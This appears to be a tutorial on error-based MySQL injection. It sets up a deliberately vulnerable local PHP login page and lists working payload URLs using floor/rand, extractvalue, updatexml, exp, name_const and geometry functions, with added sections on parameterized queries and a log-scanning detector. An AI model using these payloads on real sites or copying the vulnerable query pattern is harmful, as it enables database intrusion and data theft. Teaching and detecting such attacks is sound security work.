SQL error injection of more than 10 kinds of injection methods

Source: Internet
Author: User
Tags: rand, sql, error

Error-injection principle: rand() conflicts with GROUP BY. rand() cannot be used as an ORDER BY field, nor as a GROUP BY field: floor(rand(0)*2) yields a value that is not fixed yet repeats, so the grouping runs into a duplicate key and MySQL raises an error. floor() rounds down, keeping only the integer part; rand(0) returns a value between 0 and 1.

Local environment: build the database and test the injection posture:

    mysql> CREATE DATABASE sqli;
    mysql> CREATE TABLE user (
               id INT(11) NOT NULL AUTO_INCREMENT PRIMARY KEY,
               name VARCHAR(32) NOT NULL,   -- column widths were garbled in the source; 32 fits an MD5 hex digest
               pass VARCHAR(32) NOT NULL
           );
    mysql> INSERT INTO user (name, pass) VALUES ('admin', MD5('admin888')), ('guest', MD5('guest'));

Create the following file at the site root: index.php

    <?php
    $conn = mysql_connect("localhost", "root", "root"); // connect to the database, account root, password root
    if (!$conn) {
        die("Connection failed: " . mysql_error());
    }
    mysql_select_db("sqli", $conn);

    // Verify login info
    if (isset($_GET['name']) && isset($_GET['pass'])) {
        $name  = $_GET['name'];
        $pass  = md5($_GET['pass']);
        // user input is concatenated straight into the SQL text (this is the injection point)
        $query = "SELECT * FROM user WHERE name='$name' AND pass='$pass'";
        if ($result = mysql_query($query, $conn)) {
            $row = mysql_fetch_array($result, MYSQL_ASSOC);
            if ($row) {
                echo "<script>alert('Login successful!');</script>";
            }
        } else {
            // the raw MySQL error text is echoed back to the client
            die("Operation error: " . mysql_error());
        }
    }
    mysql_close();
    ?>
    <!DOCTYPE html>
    <html>
    <head>
        <title>Login</title>
    </head>
    <body>
    <center>
        <form method="get" action="">
            <label>Username:</label><input type="text" name="name" value=""/><br/>
            <label>Password:</label><input type="password" name="pass" value=""/><br/>
            <input type="submit" value="Login"/>
        </form>
    </center>
    </body>
    </html>

The login-verification PHP in index.php is simple:

    $name  = $_GET['name'];
    $pass  = md5($_GET['pass']);
    $query = "SELECT * FROM user WHERE name='$name' AND pass='$pass'";

The $name parameter is an obvious injection point.
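The defect is that $name is pasted into the SQL text, so the database parses attacker-controlled characters as SQL. The example below is added here and is not code from the original page; it contrasts that construction with a parameterized query. It uses Python's sqlite3 module as an in-memory stand-in for MySQL (an assumption made so it runs offline) and a constructed copy of the page's user table; the function names are hypothetical.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed stand-in for the page's `user` table (in-memory sqlite3)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT NOT NULL, pass TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO user (name, pass) VALUES (?, ?)",
        [
            ("admin", hashlib.md5(b"admin888").hexdigest()),
            ("guest", hashlib.md5(b"guest").hexdigest()),
        ],
    )
    return conn


def login_concatenated(conn, name, password):
    """Mirrors index.php: the name is interpolated into the SQL text."""
    pass_hash = hashlib.md5(password.encode()).hexdigest()
    query = f"SELECT * FROM user WHERE name='{name}' AND pass='{pass_hash}'"
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, name, password):
    """Hardened form: placeholders keep the name as data, never as SQL."""
    pass_hash = hashlib.md5(password.encode()).hexdigest()
    query = "SELECT * FROM user WHERE name=? AND pass=?"
    return conn.execute(query, (name, pass_hash)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # A quote followed by a tautology and a comment marker ("--" in sqlite,
    # "#" in MySQL) ends the intended WHERE clause in the concatenated query.
    hostile_name = "' or 1=1 --"
    print("concatenated:", login_concatenated(db, hostile_name, "anything"))   # True
    print("parameterized:", login_parameterized(db, hostile_name, "anything"))  # False
```

In the PHP of index.php the same change is a mysqli or PDO prepared statement with bound parameters. The error branch also matters: every technique below depends on mysql_error() text reaching the client, so that text should be logged server-side and replaced with a generic message.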

1. Error via floor():

http://localhost/index.php?name='+or+(select+1+from(select+count(*),concat(user(),0x7e,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+%23&pass=1

# Extract the database name: replace the inner subquery with the one you want to read

http://localhost/index.php?name='+or+(select 1 from (select count(*),concat((select (select distinct concat(0x7e,schema_name,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)+%23&pass=1

2. Error via extractvalue():

http://localhost/index.php?name='+or+extractvalue(1,concat(user(),0x7e,version()))+%23&pass=1

3. Error via updatexml():

http://localhost/index.php?name='+or+updatexml(1,concat(user(),0x7e,version()),1)+%23&pass=1

4. Error via exp(). For details see: https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/

http://localhost/index.php?name='+or+exp(~(select * from (select user())a))+%23&pass=1

5. Error via name_const() (for older versions):

http://localhost/index.php?name='+or+(select * from (select name_const(version(),1),name_const(version(),1)) as x)+%23&pass=1

6. Errors via multipoint(), multipolygon(), multilinestring(), linestring(), geometrycollection(), polygon() and similar functions:

http://localhost/index.php?name='+or+multipoint((select * from (select * from (select user())a)b))+%23&pass=1
http://localhost/index.php?name='+or+multipolygon((select * from (select * from (select database())a)b))+%23&pass=1
http://localhost/index.php?name='+or+multilinestring((select * from (select * from (select user())a)b))+%23&pass=1
http://localhost/index.php?name='+or+linestring((select * from (select * from (select user())a)b))+%23&pass=1
http://localhost/index.php?name='+or+geometrycollection((select * from (select * from (select user())a)b))+%23&pass=1
http://localhost/index.php?name='+or+polygon((select * from (select * from (select user())a)b))+%23&pass=1
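All six techniques above hinge on a small set of MySQL function names arriving in the query string. The example below is added here and is not from the original page: it scans constructed access-log lines for those signatures after URL-decoding, so that `floor (rand (0)*2)` and `floor(rand(0)*2)` are treated alike. The log lines, signature names and function names are all assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (common log format). The hostile
# requests reuse the function names from the payloads listed above.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?name=admin&pass=admin888 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?name=%27+or+extractvalue(1,concat(user(),0x7e,version()))+%23&pass=1 HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?name=%27+or+(select+1+from(select+count(*),concat(user(),0x7e,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+%23&pass=1 HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?name=%27+or+polygon((select+*+from(select+*+from(select+user())a)b))+%23&pass=1 HTTP/1.1" 200 1024',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?name=polygon+lover&pass=x HTTP/1.1" 200 512',
]

# One pattern per error-based technique, applied to the lower-cased,
# URL-decoded query string with runs of whitespace collapsed to one space.
SIGNATURES = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*\d+\s*\)[\s\S]*group\s+by"
    ),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    "exp_bitwise_not": re.compile(r"\bexp\s*\(\s*~"),
    "name_const": re.compile(r"\bname_const\s*\("),
    # geometry constructors only fire when fed a subquery, so a plain
    # word like "polygon" in a search box does not trip the rule
    "geometry_subquery": re.compile(
        r"\b(?:multipoint|multipolygon|multilinestring|linestring|geometrycollection|polygon)"
        r"\s*\(\s*\(\s*select\b"
    ),
}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def normalize_query(target):
    """Decode the query string of a request target the way PHP will see it."""
    _, _, query = target.partition("?")
    decoded = unquote_plus(query).lower()
    return re.sub(r"\s+", " ", decoded)


def scan_target(target):
    """Return the names of every signature found in one request target."""
    query = normalize_query(target)
    return [name for name, pattern in SIGNATURES.items() if pattern.search(query)]


def scan_log(lines):
    """Return (client_ip, signatures) for each log line that carries a hit."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        found = scan_target(match.group(1))
        if found:
            hits.append((line.split(" ", 1)[0], found))
    return hits


if __name__ == "__main__":
    for ip, found in scan_log(LOG_LINES):
        print(f"{ip}: {', '.join(found)}")
```

Matching is done on the decoded query, not the raw line, because the server decodes before the string reaches the query; a rule that only knew the encoded form would miss the same payload sent with different encoding. A hit on these rules is a strong signal, but the fix remains the parameterized query and a generic error page, not the filter.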
